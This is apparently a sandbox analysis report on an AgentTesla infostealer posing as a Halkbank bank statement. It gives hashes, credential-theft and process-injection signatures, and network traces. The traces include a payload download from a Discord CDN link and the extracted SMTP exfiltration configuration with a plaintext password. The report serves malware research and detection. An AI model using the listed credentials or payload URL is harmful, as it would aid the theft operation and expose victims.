Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23/09/2024, 10:50 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Halkbank_Ekstre_20240922_080921_689429.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Halkbank_Ekstre_20240922_080921_689429.exe
Resource
win10v2004-20240802-en
General
-
Target
Halkbank_Ekstre_20240922_080921_689429.exe
-
Size
110KB
-
MD5
c8cea26640b2fa181571afd43c2e4477
-
SHA1
5b9e511450b327634fcc620814ebf42cb57b0c91
-
SHA256
261f4e785355cfd784f655fe0fc4a67be3cc18bb09e742b0187cfcc284fa5240
-
SHA512
20d9aca79e7034fdd1dbd2b785af17f973c0b9a2ab38dd40338dc0217754d2ea1fd6f00ad9d60bf761dc9d8c135acf32ebd9064facc3e0f3dc9790c3cbd00212
-
SSDEEP
1536:Y48kc/9ORkoOQzhSppeT//142G1Fq9uelIA630VDx:8kE9OuDp21DiqAEVDx
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.zqamcx.com - Port:
587 - Username:
server1@zqamcx.com - Password:
Anambraeast@ - Email To:
server@zqamcx.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2068 set thread context of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Halkbank_Ekstre_20240922_080921_689429.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2820 RegAsm.exe 2820 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2068 Halkbank_Ekstre_20240922_080921_689429.exe Token: SeDebugPrivilege 2820 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2820 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30 PID 2068 wrote to memory of 2820 2068 Halkbank_Ekstre_20240922_080921_689429.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2820
-
Network
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.135.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.133.233
-
GEThttps://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&Halkbank_Ekstre_20240922_080921_689429.exeRemote address:162.159.130.233:443RequestGET /attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 327008
Connection: keep-alive
CF-Ray: 8c79f9fd4df894d5-LHR
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 10252
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="kingggggme.txt"
ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
Expires: Tue, 23 Sep 2025 10:50:54 GMT
Last-Modified: Mon, 23 Sep 2024 07:59:58 GMT
Vary: Accept-Encoding
x-goog-generation: 1727078398052007
x-goog-hash: crc32c=F3gHFg==
x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 327008
x-guploader-uploadid: AD-8ljuSgJeARyAKoFDsjKGCmnOLdW0aNJZzRI-XUBfMXltfgMk3zNRc58-0aFwDSDQQW9Hc4x64KlpuOQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=to9.io70Fy4VtcH4UvjpQtnTyfh9rG6nxLQE2CRgc9w-1727088655-1.0.1.1-HlUnKbYSOLV2yBU.Ivc9hM5SuhmGaC76lj6EQYe7Z98TOkq6kbsP4bUtrVWQ4Ljo8pqfyj_IvCfyEatZRVG64w; path=/; expires=Mon, 23-Sep-24 11:20:55 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3aCTlT8sIlx9yymfrEDvhfvvsHqquguEzyXSEvoyo6GWIhXiykyvTSXrPyIricZZPt9ea7YEuZFHEUOD7vh0f2LiWotl3WTtjAPEA36Mw6YjgrAz8UvDnmA%2F9%2Buqxnq23YMIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=ZhBkIjWaxLEc95dtVyBMyvTl34Sx5QP1.eJC3t_dJ.4-1727088655050-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
162.159.130.233:443https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&tls, httpHalkbank_Ekstre_20240922_080921_689429.exe7.4kB 344.6kB 150 261
HTTP Request
GET https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&HTTP Response
200 -
356 B 347 B 6 4
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.130.233162.159.134.233162.159.135.233162.159.129.233162.159.133.233
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1